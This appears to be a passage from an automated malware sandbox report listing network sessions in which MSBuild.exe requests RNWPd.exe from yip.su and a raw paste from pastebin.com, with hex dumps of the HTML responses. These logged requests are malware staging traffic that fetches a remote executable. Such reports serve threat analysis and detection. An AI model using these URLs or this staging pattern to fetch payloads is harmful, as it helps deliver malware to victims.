                    2024-09-16 19:22:34 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:22:34 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.649768188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:34 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:22:35 UTC900INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:22:34 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:22:34 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFPp9u0IBPws5wMYF00Jc7ZnBUAE36dUEnQ227tkrLaUbDOoYoilku0ckhZyxWMSGrEZEh3b7ftBCIedmbSd8sLe%2BxcRZt2gPJQ%2F2wwFS5kScEj%2BSd6tQ9k%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c4339e01b6f7c82-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:22:35 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:22:35 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                    Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                    2024-09-16 19:22:35 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                    Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                    2024-09-16 19:22:35 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                    Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                    2024-09-16 19:22:35 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                    Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                    2024-09-16 19:22:35 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                    Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                    2024-09-16 19:22:35 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:22:35 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.649769104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:39 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:22:40 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433a001cc21927-EWR
                    2024-09-16 19:22:40 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:22:40 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:22:40 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:22:40 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:22:40 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.649770188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:40 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:22:40 UTC904INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:22:40 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:22:40 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKnPZRLaP7FHsYiNZPvMYRI3Hq48wrYpTi1vrQqbaiEnHLV%2FOh4ThsvpHamLp1Ini%2B4T3DXKd96O02VWbFEuAQkUcJoj%2FZ2u9M%2B36XcWwp%2B4f0S3z07AQaY%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433a042e1d41ac-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:22:40 UTC465INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:22:40 UTC1369INData Raw: 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f
                    Data Ascii: t-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta pro
                    2024-09-16 19:22:40 UTC1369INData Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65
                    Data Ascii: und-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-de
                    2024-09-16 19:22:40 UTC1369INData Raw: 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e
                    Data Ascii: .userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(n
                    2024-09-16 19:22:40 UTC1369INData Raw: 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72
                    Data Ascii: ><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;bor
                    2024-09-16 19:22:40 UTC1369INData Raw: 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 